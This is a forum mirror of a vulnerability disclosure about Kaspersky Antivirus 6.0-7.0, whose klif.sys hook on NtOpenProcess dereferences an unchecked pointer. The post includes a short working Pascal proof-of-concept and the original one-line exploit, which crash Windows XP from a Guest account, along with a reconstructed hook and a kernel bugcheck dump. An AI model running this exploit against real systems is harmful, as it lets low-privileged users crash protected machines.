BYR Achieve · 镜像论坛

据说是可以本地提权，这种错误不应该犯的。 ------------------------------------------------- Exploiting Kaspersky Antivirus 6.0-7.0 By: EP_X0FF Exploiting Kaspersky Antivirus 6.0-7.0 The reasons why we decided to post this material on rootkit.com is simple: Well-known and really good Kaspersky Antivirus very long time suffers from very dangerous bug, which can be used as exploit and crash system protected by this antivirus down even from Guest account. All attempts to inform Kaspersky Lab about this vulnerability was ignored. This material was posted some years ago, and in the last summer we posted new exploit for Kaspersky AV 6.0 which was based on previously discovered by Ms-Rem security hole. And nothing was changed. Even now with upcoming Kaspersky Antivirus 7.0 this exploit works very well. The main goal of this exploit is calling NtOpenProcess with invalid parameters. This function is hooked by Kaspersky driver called klif.sys and reasons of its interception is obvious - this was made to protect Kaspersky AV from unauthorized access and closing by malware. Here is prototype of this function NTSYSAPI NTSTATUS NTAPI NtOpenProcess( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL ); Here is a small exploit coded in pascal (worked well with klif.sys version 6.12.10.280 and previous versions) var ob1: OBJECT_ATTRIBUTES; p1: DWORD; begin ob1.Length := sizeof(ob1); NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000)); end; As you see last parameter is CLIENT_ID structure - address and its points to invalid random memory region in kernel. After starting this exploit on clean Windows XP, without KAV - no BSOD appears. After starting this exploit on Windows XP protected by KAV 7.0 - we are getting immediately BSOD - PAGE_FAULT_IN_NONPAGED_AREA Why this happened? Very simple explanation. The source of Hook on NtOpenProcess, I guess, looks like this: NTSTATUS NewNtOpenProcess ( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL) { __try { if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED; else return RealNtOpenProcess(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId); __except (EXCEPTION_EXECUTE_HANDLER) { ... stuff here ... } } The biggest mistake here is ClientId->UniqueProcess, since ClientId is a POINTER to structure. Accessing to invalid memory region causes immediately PAGE_FAULT_IN_NONPAGED_AREA. Originally exploit was created by Ms-Rem and looks like NtOpenProcess(NULL, (HANDLE)0, NULL, NULL); Now as you see KAV developers have used try/except block, but as shows they don't know about MmIsAddressValid. Hope now developers of Kaspersky Antivirus will discover for themself wonderful program called - NtCall and fix this bug. ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: 83000000, memory referenced. Arg2: 00000000, value 0 = read operation, 1 = write operation. Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory address. Arg4: 00000000, (reserved) Debugging Details: ------------------ ANALYSIS: Kernel with unknown size. Will force reload symbols with known size. ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004 ***** Kernel symbols are WRONG. Please fix symbols to do analysis. ***** Kernel symbols are WRONG. Please fix symbols to do analysis. MODULE_NAME: klif FAULTING_MODULE: 804d7000 nt DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c READ_ADDRESS: unable to get nt!MmSpecialPoolStart unable to get nt!MmSpecialPoolEnd unable to get nt!MmPoolCodeStart unable to get nt!MmPoolCodeEnd 83000000 FAULTING_IP: klif+1940c f941840c 0fbe08 movsx ecx,byte ptr [eax] MM_INTERNAL_CODE: 0 CUSTOMER_CRASH_COUNT: 1 DEFAULT_BUCKET_ID: WRONG_SYMBOLS BUGCHECK_STR: 0x50 LAST_CONTROL_TRANSFER: from f941b39a to f941840c STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94 f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00 f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4 STACK_COMMAND: kb FOLLOWUP_IP: klif+1940c f941840c 0fbe08 movsx ecx,byte ptr [eax] SYMBOL_STACK_INDEX: 0 FOLLOWUP_NAME: MachineOwner IMAGE_NAME: klif.sys SYMBOL_NAME: klif+1940c BUCKET_ID: WRONG_SYMBOLS Followup: MachineOwner Kind Regards, EP_X0FF/UG North